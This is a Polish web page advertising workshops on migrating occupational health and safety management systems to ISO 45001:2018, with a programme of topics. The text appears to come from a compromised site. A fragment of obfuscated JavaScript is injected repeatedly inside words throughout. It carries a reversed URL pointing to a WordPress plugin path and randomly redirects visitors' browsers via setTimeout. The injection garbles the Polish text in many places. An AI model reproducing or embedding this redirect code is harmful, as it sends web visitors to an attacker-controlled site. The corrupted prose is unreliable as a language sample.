Migracja SZBHP na nową normę ISO 45001 – Warsztaty szkoleniowo – konsultacyjne

w zakresie migracji funkcjonujących w organizacjach SZBHP ( wg PN-N-18001:2004; OHSAS 18001:2007) na wymagania nowej normy PN-ISO 45001:2018

Celem warsztatów jest zapoznanie uczestników z wymaganiami nowej normy PN-ISO 45001:2018 Systemy Zarządzania Bezpieczeństwem i Higieną Pracy. Wymagania i wytyczne stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowania oraz analiza luk w obecnie funkcjonującym SZBHP, opracowanie harmonogramu prac uzupełniających oraz praktyczne rekomendacje ich uzupełnienia i wdrożenia dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane do potrzeb uczestników.  

Warsztaty skierowane są do wszystkich zainteresowanych dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowaniem swoich systemów do wymagań normy PN-ISO 45001:2018 jak również wdrożeniem, utrzymaniem i doskonaleniem SZBHP w tym właścicieli firm, kadry kierowniczej, pełnomocników, auditoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torów  i specjalistów ds. BHP.

Program szkolenia:

Zakres warsztatów szkoleniowo – konsultacyjnych obejmuje:

 1. Przegląd wymagań nowej normy PN ISO 45001:2018 w porównaniu z normami OHSAS 18001:2007 oraz PN-N-18001:2004 w tym:
  • określenie czynników wew. i zew. związanych z procesami BHP 
  • określenie zainteresowanych stron wew. / otoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toczenie bliskie –  zew. / otoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toczenie dalekie
  • określenie, ocenę i wdrożenie ryzyk i szans oraz działań z nich wynikających
  • role w organizacji
  • udział i konsultacje pracowników
  • planowanie sterowania operacyjnego
  • outsourcing, zakupy, wykonawców
  • monitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torowanie, pomiary, analizy i oceny
  • weryfikacja udokumentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanych informacji
  • wytyczne prowadzenie auditów
  • proces ciągłego doskonalenia
 2. Analiza luk na podstawie dokumentacji systemów zarządzania uczestników warsztatów
 3. Opracowanie i udokumentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie procesu(ów) BHP
 4. Wypracowanie praktycznych rekomendacji uzupełnienia luk systemów zarządzania dostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowanych do potrzeb uczestników

Terminy, miejsce i cena do uzgodnienia z Klientem
W celu osiągnięcia maksymalnych efektów zalecana jest indywidualna forma warsztatów dedykowana dla jednej Organizacji.

Członkowie Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarzyszenia Polskie Forum ISO 45000 – ulga finansowa zgodnie z regulaminem składek członkowskich.

Więcej informacji …